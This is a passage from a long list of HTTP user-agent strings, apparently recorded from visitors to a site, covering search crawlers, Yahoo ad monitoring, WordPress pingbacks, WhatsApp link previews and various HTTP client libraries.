https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617668259-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617673812-0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) adbeat.com/policy Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.123 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +YOURLS v1.7.1 +http://yourls.org/ (running on http://urlma.de) +WordPress/5.5.3; https://www.ultrasoundtechniciancenter.org; verifying pingback from 144.168.157.182 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617676755-10 +WhatsApp/2.21.8.1 A +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617668542-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617668540-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617669429-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617675342-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617676318-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617689741-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617721673-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617721675-0 +WhatsApp/2.21.6.15 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.124 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.112 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Java/1.6.0_22q +NCSA_Mosaic/2.0 ( Java 1.0) +WordPress/5.7; https://digitalniarchitekti.cz +GoogleTV/b70199 Silk-Accelerated=true +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4453.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.122 Safari/537.36 +GuzzleHttp/6.5.5 curl/7.69.1 PHP/7.3.24 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617755097-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617763916-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617808100-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617808113-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617808102-10 +Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://www.majestic12.co.uk/bot.php?+) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 8.0.0; SM-J600F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617755452-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617764112-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617828964-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617834092-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617835749-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.125 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617767656-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617768219-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617797041-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617799743-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617801728-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617801905-0 +WhatsApp/2.21.8.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617807040-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Mobile Safari/537.36 PTST/210407.125438 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617831255-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617831254-0 +ArchiveTeam ArchiveBot/20210302.d21680e (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 PTST/210407.125438 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.122 Mobile Safari/537.36 +WordPress/5.7; https://geopressa.ru EWWW/611 +Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617841141-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617849608-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617897944-0 +WhatsApp/2.21.8.4 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +PHP/6.2.37 +WordPress/5.7; https://7th-studio.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617843879-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617845078-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617853001-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud) +WhatsApp/2.21.60.18 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617891020-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617901340-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617910139-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 PTST/210407.193637 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Mobile Safari/537.36 PTST/210407.193637 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.112 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.126 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1617874119-0 +\x22Googlebot/2.1 ( http://www.googlebot.com/bot.html)\x22Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html +WordPress/5.6.2; https://creeis.me +Mozilla/5.0 (compatible; LinkpadBot/2.4; +https://linkpad.org/robot/) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4470.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/91.0.4470.0 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617928166-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617935843-0 +Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot) +Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot) +PHP/7.2.35 +PHP/7.3.81 +PHP/6.2.29 +PHP/6.3.35 +PHP/7.3.64 +PHP/7.2.68 +PHP/6.3.03 +PHP/6.2.61 +Mozilla/5.0 (X11; Linux x86_64; rv:87.0) adbeat.com/policy Gecko/20100101 Firefox/87.0 +WhatsApp/2.21.8.5 A +Mozilla/5.0 (X11; Linux x86_64; rv:53.0) adbeat.com/policy Gecko/20100101 Firefox/53.0 +WordPress/5.3.6; https://flagmanplus.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617939103-0 +WordPress/5.7; https://7th-studio.ru EWWW/611 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36,gzip(gfe) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Mobile Safari/537.36 PTST/210408.162353 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 PTST/210408.162353 +Tiny Tiny RSS/21.04-49ef15f11 (http://tt-rss.org/) +yacybot (/global; amd64 Linux 5.4.0-70-generic; java 1.8.0_282; Etc/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618020510-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618030204-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +PHP/7.3.66 +PHP/7.3.47 +WordPress/5.7; https://eurolearnit.org +WordPress/5.7; http://wildfire.asia +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Apache-HttpClient/4.5.10 (Java/16) +WhatsApp/2.21.8.6 A +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/89.0.4389.112Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.125 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.7; https://ccdog.ru +Python/3.6 aiohttp/3.7.4.post0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618151891-10 +WhatsApp/2.2112.10 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618150471-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618150472-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618156932-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618156930-0 +WordPress/5.7; https://archives.igelcommunity.com +Google/Pixel 2 XL (Linux;Android 11) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.127 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618258278-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618258281-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618195392-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618195385-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618195386-0 +Apache-HttpClient/4.5.12 (Java/14.0.2) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618226540-0 +WhatsApp/2.20.206.23 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618254229-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618260665-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618260668-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618264206-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618268845-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618268867-0 +Screaming Frog SEO Spider/15.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618253626-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618253627-0 +Mozilla/5.0 (compatible; idmarch Automatic.beta/1.4; +https://www.pdfsearch.io/bot.html)/Nutch-1.13 +WhatsApp/2.21.8.7 A +WhatsApp/2.21.7.14 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618352403-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618352402-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.129 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.127 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 PTST/210413.183918 +curl/7.45.0-DEV +Google/Pixel 3a (Linux;Android 11) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 PTST/210413.183918 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618360094-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618368186-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618396136-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618404556-0 +WordPress/5.6; https://developer.salesforce.com/blogs +WordPress/5.7; https://crmnewsbrief.com +WordPress/5.7; https://www.sfnewsbrief.com +WordPress/5.7; https://slacker.ro +WordPress/5.7; https://discover.egafutura.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Mobile Safari/537.36 PTST/210414.184056 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618358880-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Mobile Safari/537.36 PTST/210413.183918 +WhatsApp/2.21.8.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618360151-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618368572-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618391543-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618398725-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618407345-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618413491-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618413483-0 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) anywhere.app/8.2.22 Chrome/80.0.3987.165 Electron/8.5.0 Safari/537.36 Tc-webkit AppEngine-Google; (+http://code.google.com/appengine; appid: s~live-fullspectrum) +curl/7.19.6 (i386-redhat-linux-gnu) libcurl/7.19.6 NSS/3.12.4.5 zlib/1.2.3 libidn/1.9 libssh2/1.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618450823-0 +WordPress/5.6; https://blog.gigminds.com +WordPress/5.4.4; https://www.informusgroup.com +WordPress/5.7.1; https://windowsquestions.com +WordPress/5.7.1; https://blogctf.tk +WhatsApp/2.21.8.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618445012-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618445071-0 +WordPress/5.7; https://inpics.site +Java/1.8.0_275-snc1 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Mobile Safari/537.36 PTST/210414.184056 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 PTST/210414.184056 +WordPress/5.7.1; https://chiptuninger.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 PTST/210414.184056 +WordPress/5.7.1; https://dragon72.ru +WhatsApp/2.21.7.15 A +WordPress/5.7.1; https://geopressa.ru EWWW/611 +WordPress/5.4.5; https://hardsk.com +search.ch/8.4 Android/10; OnePlus:GM1900; Android-universal; GMS-available; (Linux; Android 10; GM1900 Build/QKQ1.190716.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.66 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; http://www.google.com/bot.html),gzip(gfe) +WordPress/4.9.16; http://apeksha.login4website.com/socialapistatus +yacybot (/global; amd64 Linux 5.10.24-0-lts; java 1.8.0_275; America/en) http://yacy.net/bot.html +WordPress/5.7.1; https://errorsfixing.com +WordPress/5.7.1; https://bitlab.com.br/bitwiki +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +WordPress/5.4.5; https://sospermisdeconduire.ch +WordPress/5.2.10; https://superworldvitamin.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618557508-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618562847-0 +WordPress/5.7.1; https://www.beatcameraa.com +WhatsApp/2.21.8.12 A +WordPress/5.7.1; 